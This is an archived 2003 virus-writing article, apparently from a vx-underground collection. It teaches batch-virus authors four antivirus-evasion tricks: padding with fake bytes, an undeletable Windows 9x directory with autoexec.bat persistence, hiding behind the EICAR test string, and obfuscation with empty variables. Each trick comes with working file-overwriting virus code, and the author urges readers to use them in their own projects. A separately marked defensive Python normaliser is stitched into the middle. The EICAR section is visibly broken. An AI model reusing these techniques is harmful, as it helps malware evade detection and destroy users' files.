-- Contact -- https://twitter.com/vxunderground vxug@null.net

intro words

While making my Batch Worm Generator I discovered many very useful techniques for batch viruses, for instance about encryption or polymorphism. But I also discovered some other techniques. These are anti-AV techniques, and I thought I shouldn't let them die. Now let's start...


I'm sure that you want to know which techniques I want to talk about. So, here is the shit of content :)

  1. Including fake bytes
  2. Using an undeletable directory (Not for Win2000|NT|XP)
  3. Including the EICAR-Testfile
  4. Pseudo-Trash between the code

Including fake bytes

This is a special anti-KAV-heuristic technique. Maybe you know that KAV only searches the first 1000 bytes for the virus (I think only in batch viruses). What does that mean for us? Guess what? :) We include 1000 silly bytes before the start of our virus, which don't do anything. And what is the effect? Let's test it. First we have a very silly code string that only spreads itself in the current dir by overwriting batch files. KAV named it 'BAT.Silly.d'.


for %%a in (*.bat) do copy %0 %%a

Now let's test our new technique. Including 1000 fake bytes should not be a serious problem. Because batch ignores simple input errors, we won't have any problems with it. My string contains random lowercase letters. But it should be no problem to include other characters too, like uppercase letters or numbers and so on. Important note: Do not include a '<' or a '>', because the computer will 'think' that you want to read from or write to a file.

Fake Bytes


for %%a in (*.bat) do copy %0 %%a

The thing looks damn stupid, but the effect is genial :). The whole virus works, but KAV doesn't show any alarm. And also no heuristic alarm. I'm sure that you will like this technique very much.

Using an undeletable directory (Not for Win2000|NT|XP)

This technique's name looks very cool. And don't worry, it IS very cool. But first let me explain what it is: Windows 95 and Windows 98 have a bug. If you try to make a new directory in MS-DOS whose name contains some special characters, Windows won't be able to work with that directory. You can't open the directory, move it or delete it. That's the principle of our technique, because batch is a DOS script. Now let's have a look at the characters which make that possible.

Letter List

ASCII  176: °
ASCII  177: ±
ASCII  178: ²
ASCII  179: ³
ASCII  180: ´
ASCII  185: ¹
ASCII  186: º
ASCII  187: »
ASCII  188: ¼
ASCII  191: ¿
ASCII  192: À
ASCII  193: Á
ASCII  194: Â
ASCII  195: Ã
ASCII  196: Ä
ASCII  197: Å
ASCII  200: È
ASCII  201: É
ASCII  202: Ê
ASCII  203: Ë
ASCII  204: Ì
ASCII  205: Í
ASCII  206: Î
ASCII  213: Õ
ASCII  217: Ù
ASCII  218: Ú
ASCII  219: Û
ASCII  220: Ü
ASCII  223: ß
ASCII  242: ò

OK, we know all the characters which are possible. Now let's make a little sample with that technique. My sample makes an undeletable directory in %windir% and writes something to autoexec.bat, which makes the virus start at every Windows boot.

Letter List example

@echo off
cd %windir%
md º´ÜòÌ
cd º´ÜòÌ
copy %0 virus.bat
echo cd %windir% >>autoexec.bat
echo cd º´ÜòÌ >>autoexec.bat
echo virus.bat >>autoexec.bat

I'm sure that you'll understand the example. A special thanks goes to the author of 'Trojan.BAT.NoDelDir', but unfortunately I don't know who it is. If you read this, please contact me!!!

Including the EICAR-Testfile

I think that everybody knows what the EICAR virus test file is. If not, I'll explain it: It's a .com file from EICAR, and every scanner detects it. It's only for testing your AV. It's no virus, but it writes a string to the DOS screen. OK, sounds nice, but how can we use it? Because nearly everybody knows about that file, nobody is scared of a warning from his AV about that detection. That's the point. We include the EICAR file in our program, so users won't be scared of it. Here is the EICAR file content:



This is the same principle as the fake bytes. But it contains meaningful content: the EICAR file. It's the same 'virus' that I used in the fake-byte technique. But now it's no longer detected as 'BAT.Silly.d' but as 'EICAR-Test-File'. And we had success :)

EICAR-content example

%%a in (*.bat) do copy %0 %%a

Pseudo-Trash between the code

The title sounds amazing. So, what do I mean by 'Pseudo-Trash'? Anything that is written down in the code but does not exist at runtime. You may think that I'm stoned/drunk or whatever, but it's the only possible explanation. Think about the explanation. What comes to your mind? Maybe the command 'set'? Then you're on the right way. OK, a variable contains some content. But the point is that a variable can also contain '' (= nothing). Now we solved our problem :) Let's look at the code. It's again the silly virus, which is detected by KAV as 'BAT.Silly.d'.

Pseudo-Trash example

%anyting%fo%anyting%r %%a i%anyting%n (%anyting%*.ba%anyting%t) d%anyting%o co%anyting%py %0 %%a

As you can see, the thing is very (!!!) easy to make, but it's also useful. Note: you have to know that the variable you use has no content. Otherwise the virus won't work. If you are not sure about the content, include the line 'set anyting=', so you delete the content.
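An added example, not from the original article: a small Python normaliser that a defender can run over a batch file to undo the three text-level tricks described above (the leading fake bytes, the extended-ASCII directory names from the letter list, and the empty-variable 'pseudo-trash') so that the real command line is visible to a scanner. The command-word list, the 512-byte padding threshold, the list of OS-provided variables and the sample input are my own assumptions and constructions; the byte values come from the page's letter list and the obfuscated line is the one shown in the pseudo-trash example.

```python
# Added example (not from the original article): normalise a batch file so
# the tricks described on this page are undone before a scanner looks at it.
import re

# Byte values from the article's letter list: Win9x could not handle these in
# directory names. The page renders them as Latin-1 glyphs; here they are bytes.
ODD_DIR_BYTES = {176, 177, 178, 179, 180, 185, 186, 187, 188, 191, 192, 193,
                 194, 195, 196, 197, 200, 201, 202, 203, 204, 205, 206, 213,
                 217, 218, 219, 220, 223, 242}

# Words a normal batch line is expected to start with (assumed, not exhaustive).
KNOWN_COMMANDS = {"@echo", "echo", "for", "if", "set", "cd", "md", "mkdir",
                  "copy", "del", "goto", "call", "rem", "start", "cls", "exit"}

# Variables assumed to be populated by the OS, so %windir% etc. are not stripped.
BUILTIN_VARS = {"windir", "path", "temp", "tmp", "comspec", "prompt"}

LEADING_JUNK_LIMIT = 512   # bytes tolerated before the first recognisable command (assumed)

VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
SET_RE = re.compile(r"^\s*set\s+([A-Za-z_][A-Za-z0-9_]*)=(.*)$", re.IGNORECASE)
DIR_CMD_RE = re.compile(r"^\s*(?:md|mkdir|cd)\s+(.+?)\s*$", re.IGNORECASE)


def assigned_vars(lines):
    """Names the script itself sets to a non-empty value; 'set x=' does not count."""
    names = set()
    for line in lines:
        m = SET_RE.match(line)
        if m and m.group(2).strip():
            names.add(m.group(1).lower())
    return names


def strip_empty_expansions(line, assigned):
    """Drop %name% tokens that can only expand to '' (never assigned by the
    script and not an OS builtin). Returns (cleaned line, tokens removed).
    '%%a' and '%0' never match VAR_RE, so loop variables and arguments survive."""
    removed = 0

    def repl(m):
        nonlocal removed
        name = m.group(1).lower()
        if name in assigned or name in BUILTIN_VARS:
            return m.group(0)
        removed += 1
        return ""

    return VAR_RE.sub(repl, line), removed


def first_word(line):
    parts = line.split(None, 1)
    return parts[0].lower() if parts else ""


def analyze(data):
    """Return the normalised text plus indicators for the page's three tricks."""
    text = data.decode("latin-1")            # 1:1 mapping: ord(ch) == byte value
    assigned = assigned_vars(text.splitlines())

    normalized, removed_total, odd_dirs = [], 0, []
    leading_junk, offset = None, 0
    for raw in text.splitlines(keepends=True):
        clean, removed = strip_empty_expansions(raw.rstrip("\r\n"), assigned)
        removed_total += removed
        # Fake-byte padding: how much data sits before the first real command line.
        if leading_junk is None and first_word(clean) in KNOWN_COMMANDS:
            leading_junk = offset
        # Undeletable-directory trick: md/mkdir/cd with bytes from the letter list.
        m = DIR_CMD_RE.match(clean)
        if m and any(ord(ch) in ODD_DIR_BYTES for ch in m.group(1)):
            odd_dirs.append(m.group(1))
        normalized.append(clean)
        offset += len(raw)
    if leading_junk is None:                  # no command line found at all
        leading_junk = len(text)

    return {
        "normalized": "\n".join(normalized),
        "empty_expansions": removed_total,
        "leading_junk_bytes": leading_junk,
        "odd_dir_names": odd_dirs,
        "suspicious": (removed_total > 0 or leading_junk > LEADING_JUNK_LIMIT
                       or bool(odd_dirs)),
    }


# Constructed sample: 1200 filler bytes, the article's pseudo-trash line, and a
# mkdir whose name is built from the page's letter list (raw byte values).
SAMPLE = (
    b"x" * 1200 + b"\r\n"
    + b"%anyting%fo%anyting%r %%a i%anyting%n (%anyting%*.ba%anyting%t) "
      b"d%anyting%o co%anyting%py %0 %%a\r\n"
    + b"cd %windir%\r\n"
    + b"md " + bytes([186, 180, 220, 242, 204]) + b"\r\n"
)

if __name__ == "__main__":
    report = analyze(SAMPLE)
    print(report["normalized"].splitlines()[1])      # the real one-liner
    print({k: v for k, v in report.items() if k != "normalized"})
```

The normaliser deliberately only strips expansions of variables the script never assigns, so `%windir%` in the directory example above survives; a variable emptied in autoexec.bat or elsewhere outside the file is not visible to it, which is the same blind spot a scanner has without executing the script, and why the three indicators are reported separately rather than folded into one verdict.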

last words

These techniques could be really useful if you also include other anti-AV tricks. If you include all these things and also encryption or polymorphism or whatever, AVs will have real problems. Now I hope that you'll try to use some (or maybe all :D ) of these things in your future projects, otherwise I wasted many hours discovering the techniques, searching for errors and better ways to do it, checking the behaviour on other OSes and writing the article. OK, in the end I want to say sorry about my English spelling or grammar mistakes :).

							- - - - - - - - - - - - - - -
							  Second Part To Hell/[rRlf]  
							  written in june 2003
							- - - - - - - - - - - - - - -